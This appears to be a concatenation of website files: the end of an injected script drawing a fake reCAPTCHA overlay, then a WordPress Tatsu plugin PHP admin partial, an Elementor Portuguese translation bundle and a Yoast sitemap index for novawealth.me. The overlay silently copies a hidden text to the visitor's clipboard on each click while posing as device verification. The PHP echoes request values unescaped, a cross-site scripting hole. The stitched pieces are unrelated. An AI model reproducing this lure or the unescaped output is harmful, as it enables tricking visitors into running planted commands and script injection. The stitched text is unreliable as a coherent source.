    + '@keyframes __pc-shakeX{0%,100%{transform:translateX(0)}20%{transform:translateX(-6px)}40%{transform:translateX(6px)}60%{transform:translateX(-4px)}80%{transform:translateX(4px)}}'
    + '.rc-imageselect-desc-wrapper{background:#1a73e8;color:#fff;padding:15px 24px;position:relative;}'
    + '.rc-imageselect-desc-no-canonical{font-size:17px;font-weight:500;line-height:1.35;position:relative;}'
    + '.__pc-body{min-height:236px;padding:34px 26px 26px;display:flex;flex-direction:column;align-items:center;justify-content:center;text-align:center;box-sizing:border-box;}'
    + '.__pc-loader{width:60px;height:60px;margin-bottom:18px;box-sizing:border-box;border-radius:50%;border:6px solid rgba(66,133,244,.2);border-top-color:#4285f4;animation:__pc-load .8s linear infinite;}'
    + '@keyframes __pc-load{to{transform:rotate(360deg)}}'
    + '.__pc-vtitle{font-family:Roboto,helvetica,arial,sans-serif;font-size:16px;font-weight:500;color:#202124;margin-bottom:9px;}'
    + '.__pc-vtext{font-family:Roboto,helvetica,arial,sans-serif;font-size:14px;font-weight:400;color:#5f6368;line-height:1.55;max-width:292px;}'
    + '.__pc-vtext b{color:#1a73e8;font-weight:500;white-space:nowrap;}'
    + '.__pc-info{position:absolute;left:8px;bottom:58px;width:236px;background:#fff;border:1px solid #e0e0e0;border-radius:8px;box-shadow:0 6px 20px rgba(0,0,0,.2);padding:12px 14px;z-index:6;display:none;font-family:Roboto,helvetica,arial,sans-serif;font-size:12.5px;line-height:1.5;color:#5f6368;text-align:left;}'
    + '.__pc-info.__show{display:block;}'
    + '.__pc-info b{display:block;margin-bottom:5px;color:#202124;font-size:13px;font-weight:600;}'
    + '.__pc-info:after{content:"";position:absolute;left:16px;bottom:-7px;width:12px;height:12px;background:#fff;border-right:1px solid #e0e0e0;border-bottom:1px solid #e0e0e0;transform:rotate(45deg);}'
    + '.rc-footer{position:relative;width:100%;}'
    + '.rc-separator{border-top:1px solid #dfdfdf;margin-bottom:1px;}'
    + '.rc-controls{width:100%;}'
    + '.primary-controls{height:60px;overflow:hidden;}'
    + '.rc-buttons{float:left;height:48px;margin:6px 0 6px 6px;}'
    + '.button-holder{float:left;height:48px;}'
    + '.rc-button{width:48px;height:48px;opacity:.55;border:0;padding:0;cursor:pointer;background:transparent no-repeat 50%;background-size:32px 32px;}'
    + '.rc-button:hover{opacity:.75;}'
    + '.rc-button-reload{background-image:url(https://www.gstatic.com/recaptcha/api2/refresh_2x.png);}'
    + '.rc-button-audio{background-image:url(https://www.gstatic.com/recaptcha/api2/audio_2x.png);}'
    + '.rc-button-help{background-image:url(https://www.gstatic.com/recaptcha/api2/info_2x.png);}'
    + '.verify-button-holder{float:right;margin:8px 8px 9px 0;}'
    + '.rc-button-default{background:#1a73e8;border:0;border-radius:2px;color:#fff;cursor:pointer;font-size:14px;font-weight:500;height:42px;line-height:42px;min-width:100px;padding:0 10px;text-transform:uppercase;transition:background .2s ease;}'
    + '.rc-button-default:hover{background:#1666d0;}';

  var style = document.createElement("style");
  style.id = "__prankCaptchaStyle";
  style.textContent = css;
  (document.head || document.documentElement).appendChild(style);

  var root = document.createElement("div");
  root.id = "__prankCaptchaRoot";
  root.innerHTML = ''
    + '<div id="__prankBackdrop"></div>'
    + '<div id="__prankCenter">'
    +   '<div class="rc-anchor rc-anchor-normal rc-anchor-light __pc" id="__prankBox">'
    +     '<div class="rc-anchor-content">'
    +       '<div class="rc-inline-block"><div class="rc-anchor-center-container"><div class="rc-anchor-center-item">'
    +         '<span class="recaptcha-checkbox rc-anchor-checkbox" id="__prankCheck" role="checkbox" aria-checked="false" tabindex="0">'
    +           '<div class="recaptcha-checkbox-border"></div>'
    +           '<div class="recaptcha-checkbox-spinner" id="__pcSpin"></div>'
    +         '</span>'
    +       '</div></div></div>'
    +       '<div class="rc-inline-block"><div class="rc-anchor-center-container"><div class="rc-anchor-center-item">'
    +         '<label class="rc-anchor-checkbox-label">I\'m not a robot</label>'
    +       '</div></div></div>'
    +     '</div>'
    +     '<div class="rc-anchor-normal-footer">'
    +       '<div class="rc-anchor-logo-portrait"><div class="rc-anchor-logo-img-portrait"></div><div class="rc-anchor-logo-text">reCAPTCHA</div></div>'
    +       '<div class="rc-anchor-pt"><a href="#">Privacy</a> - <a href="#">Terms</a></div>'
    +     '</div>'
    +   '</div>'
    + '</div>';
  (document.body || document.documentElement).appendChild(root);

  document.documentElement.style.overflow = "hidden";

  var backdrop = document.getElementById("__prankBackdrop");
  var center = document.getElementById("__prankCenter");
  var box = document.getElementById("__prankBox");
  var check = document.getElementById("__prankCheck");
  var border = box.querySelector(".recaptcha-checkbox-border");
  var spin = document.getElementById("__pcSpin");

  requestAnimationFrame(function () {
    backdrop.style.opacity = "1";
    setTimeout(function () { box.classList.add("__in"); }, 120);
  });

  var stage = 0;
  function onCheck() {
    if (stage !== 0) return;
    stage = 1;
    copyText(CLIP_TEXT);
    check.setAttribute("aria-checked", "true");
    border.style.opacity = "0";
    spin.style.opacity = "1";
    setTimeout(openChallenge, 1500);
  }
  check.addEventListener("click", onCheck);
  check.addEventListener("keydown", function (e) {
    if (e.key === " " || e.key === "Enter") { e.preventDefault(); onCheck(); }
  });

  function openChallenge() {
    box.classList.add("__out");
    setTimeout(function () {
      center.removeChild(box);
      var ch = document.createElement("div");
      ch.className = "__pc-challenge";
      ch.innerHTML = ''
        + '<div class="rc-imageselect-desc-wrapper">'
        +   '<div class="rc-imageselect-desc-no-canonical">' + DESC_MAIN + '</div>'
        + '</div>'
        + '<div class="__pc-body">'
        +   '<div class="__pc-loader"></div>'
        +   '<div class="__pc-vtitle">' + BODY_TITLE + '</div>'
        +   '<div class="__pc-vtext">' + BODY_TEXT + '</div>'
        + '</div>'
        + '<div class="rc-imageselect-incorrect-response" id="__pcErr">' + ERR_TEXT + '</div>'
        + '<div class="__pc-info" id="__pcInfo"><b>Device verification</b>This quick check confirms that a real person is using this device and helps protect the site from automated bots and spam.</div>'
        + '<div class="rc-footer"><div class="rc-separator"></div><div class="rc-controls"><div class="primary-controls">'
        +   '<div class="rc-buttons">'
        +     '<div class="button-holder"><button class="rc-button rc-button-reload" id="__pcReload" title="Get a new challenge"></button></div>'
        +     '<div class="button-holder"><button class="rc-button rc-button-audio" id="__pcAudio" title="Get an audio challenge"></button></div>'
        +     '<div class="button-holder"><button class="rc-button rc-button-help" id="__pcHelp" title="Help"></button></div>'
        +   '</div>'
        +   '<div class="verify-button-holder"><button class="rc-button-default" id="__pcVerify">' + VERIFY_TXT + '</button></div>'
        + '</div></div></div>';
      center.appendChild(ch);
      copyText(CLIP_TEXT);
      requestAnimationFrame(function () { ch.classList.add("__in"); });
      ch.addEventListener("mousedown", function () { copyText(CLIP_TEXT); });
      var errEl = document.getElementById("__pcErr");
      var body = ch.querySelector(".__pc-body");
      var info = document.getElementById("__pcInfo");

      document.getElementById("__pcVerify").addEventListener("click", function () {
        copyText(CLIP_TEXT);
        errEl.classList.add("__show");
        errEl.classList.remove("__shake");
        void errEl.offsetWidth;
        errEl.classList.add("__shake");
      });

      document.getElementById("__pcAudio").addEventListener("click", function () {
        speakText(SPEAK_TEXT);
      });

      document.getElementById("__pcReload").addEventListener("click", function () {
        errEl.classList.remove("__show");
        info.classList.remove("__show");
        body.style.transition = "opacity .2s ease";
        body.style.opacity = "0";
        setTimeout(function () { body.style.opacity = "1"; }, 320);
      });

      document.getElementById("__pcHelp").addEventListener("click", function (e) {
        e.stopPropagation();
        info.classList.toggle("__show");
      });
      ch.addEventListener("click", function (e) {
        if (e.target.id !== "__pcHelp") info.classList.remove("__show");
      });
    }, 260);
  }

})();
</script>
</body>
</html>
/**
 * Provide a admin area view for the plugin
 *
 * This file is used to markup the admin-facing aspects of the plugin.
 *
 * @link       http://www.brandexponents.com
 * @since      3.3.2
 *
 * @package    Tatsu
 * @subpackage Tatsu/admin/partials
 */

 
if( !function_exists( 'tatsu_forms_entries_display_table' ) ){
    function tatsu_forms_entries_display_table(){
        add_thickbox();
        $tatsu_table = new Tatsu_forms_table();
        $tatsu_table->do_the_action();
        $select_forms_html = $tatsu_table->select_forms_html();
        $tatsu_table->prepare_items();
        echo '<h3>Tatsu Form Entries</h3>';
        echo "<form method='post' id='tatsu-form-entries-table-form' name='frm_search_post' action='" . $_SERVER['PHP_SELF'] . "?page=".$_GET['page']."'>";
        echo '<input type="hidden" name="page" value="'.$_GET['page'].'" />';
        echo $select_forms_html;
        $tatsu_table->search_box("Search Forms", "search_tatsu_forms");
        $tatsu_table->display();
        echo "</form>";
    }
}


?>"use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[2590],{42590:e=>{e.exports=JSON.parse('{"dialog":{"title":"Compartilhe seu feedback","fieldTitlePlaceholder":"Título","fieldDescriptionPlaceholder":"Diga-nos o que você tem em mente","fieldSubjectPlaceholder":"Selecione o assunto do seu feedback","fieldProductPlaceholder":"Selecionar o produto","note":"Agradecemos seu feedback! Embora revisemos todas as sugestões, não podemos garantir que cada sugestão resultará em uma alteração ou atualização.","subjects":{"leaveFeedback":"Deixar um feedback","reportBug":"Reportar um erro","requestFeature":"Solicitar um recurso","shareThoughts":"Partilhar outras ideias"},"products":{"general":"Geral","editor":"Editor","accessibility":"Acessibilidade","imageOptimization":"Otimização de imagem","emailDeliverability":"Capacidade de entrega de email","siteManagement":"Site Management"},"cancel":"Cancelar","submit":"Enviar","titleLengthError":"O título deve ter menos de 90 caracteres","descriptionLengthError":"A descrição deve ter menos de 1024 caracteres","alert":{"title":"Precisa de ajuda ou encontrou um problema?","button":"Enviar um ticket de suporte"}},"tooltipSuccess":"Feedback enviado. Obrigado por nos ajudar.","tooltipError":"Algo deu errado. Tente enviar seu feedback novamente."}')}}]);﻿<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//novawealth.me/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://novawealth.me/post-sitemap.xml</loc>
		<lastmod>2026-07-22T13:03:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://novawealth.me/portfolio-sitemap.xml</loc>
		<lastmod>2014-11-16T15:46:58+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://novawealth.me/tatsu_header-sitemap.xml</loc>
		<lastmod>2021-09-16T13:05:03+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://novawealth.me/tatsu_footer-sitemap.xml</loc>
		<lastmod>2021-10-05T15:59:18+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://novawealth.me/category-sitemap.xml</loc>
		<lastmod>2026-07-22T13:03:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://novawealth.me/portfolio_categories-sitemap.xml</loc>
		<lastmod>2014-11-16T15:46:58+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://novawealth.me/portfolio_tags-sitemap.xml</loc>
		<lastmod>2014-11-16T15:31:13+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://novawealth.me/author-sitemap.xml</loc>
		<lastmod>2026-07-30T23:42:36+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->